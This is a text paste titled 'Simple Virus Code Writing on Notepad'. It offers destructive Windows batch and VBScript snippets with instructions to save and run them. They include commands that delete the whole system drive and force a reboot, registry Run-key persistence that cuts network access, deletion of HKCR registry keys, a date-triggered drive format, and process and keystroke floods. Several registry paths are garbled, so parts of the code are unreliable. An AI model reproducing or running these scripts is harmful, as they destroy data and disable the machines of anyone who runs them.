Simple Virus Code Writing on Notepad


SUBMITTED BY: samuel4aos

DATE: Aug. 31, 2016, 8:17 a.m.

FORMAT: Text only

SIZE: 3.3 kB

HITS: 726

  1. IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .
  2. All Scripts Here Are To Be Copied In Note Pad
  3. >>This Virus Deletes All The Content Of A Drive...
  4. @echo off
  5. del %systemdrive%\*.* /f /s /q
  6. shutdown -r -f -t 00
  7. Save The Above Code a .bat file
  8. ________________________________________
  9. >>Disable Internet Permanently
  10. Save As A bat File
  11. echo @echo off>c:windowswimn32.bat
  12. echo break off>>c:windowswimn32.bat
  13. echo ipconfig/release_all>>c:windowswimn32.bat
  14. echo end>>c:windowswimn32.bat
  15. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  16. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  17. echo You Have Been HACKED!
  18. PAUSE
  19. ________________________________________
  20. >>The Most Simple Virus To Crush The Window
  21. @Echo off
  22. Del C:\ *.* |y
  23. Save It As Anything.bat
  24. ________________________________________
  25. >> This Will Crash Ur Computer
  26. Option Explicit
  27. Dim WSHShell
  28. Set WSHShell=Wscript.CreateObject("Wscript.Shell")
  29. Dim x
  30. For x = 1 to 100000000
  31. WSHShell.Run "Tourstart.exe"
  32. Next
  33. Save It As Anything.vbs
  34. It Only Works With Windows XP
  35. ________________________________________
  36. >>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
  37. This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
  38. Code:-
  39. @ECHO OFF
  40. START reg delete HKCR/.exe
  41. START reg delete HKCR/.dll
  42. START reg delete HKCR/*
  43. :MESSAGE
  44. ECHO Your computer has been fcked. Have a nice day.
  45. GOTO MESSAGE
  46. ________________________________________
  47. >>Endless Notepads
  48. *This will pop up endless notepads until the computer freezes and crashes*
  49. Code:-
  50. @ECHO off
  51. :top
  52. START %SystemRoot%\system32\notepad.exe
  53. GOTO top
  54. ________________________________________
  55. >> Bomb Virus
  56. Copy Paste The Following
  57. If %date% NEQ 2009/11/25 goto exit
  58. format E: /y >nul
  59. :exit
  60. exit
  61. And Save It As Anything.bat
  62. Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
  63. The Virus Will Take Effect On That Day
  64. ________________________________________
  65. >>Crazy caps lock
  66. *This constantly turns caps lock on and off really fast continuously*
  67. Code:-
  68. Set wshShell =wscript.CreateObject(”WScript.Shell”)
  69. do
  70. wscript.sleep 100
  71. wshshell.sendkeys “{CAPSLOCK}”
  72. loop
  73. ________________________________________
  74. >>Endless Enter
  75. *This constantly makes it so the enter button is being pressed continuesly*
  76. Code:-
  77. Set wshShell = wscript.CreateObject(”WScript.Shell”)
  78. do
  79. wscript.sleep 100
  80. wshshell.sendkeys “~(enter)”
  81. loop
  82. ________________________________________
  83. >>Endless Backspace
  84. *This makes it so the backspace key is constantly being pressed*
  85. Code:-
  86. MsgBox “Let’s go back a few steps”
  87. Set wshShell =wscript.CreateObject(”WScript.Shell”)
  88. do
  89. wscript.sleep 100
  90. wshshell.sendkeys “{bs}”
  91. loop
  92. ________________________________________
  93. What sex is your computer ?
  94. -> open notepad
  95. -> copy code
  96. CreateObject("SAPI.SpVoice").Speak"I love YOU"
  97. -> n paste on the Notepad
  98. -> save as > love.vbs
  99. -> double-click on it

comments powered by Disqus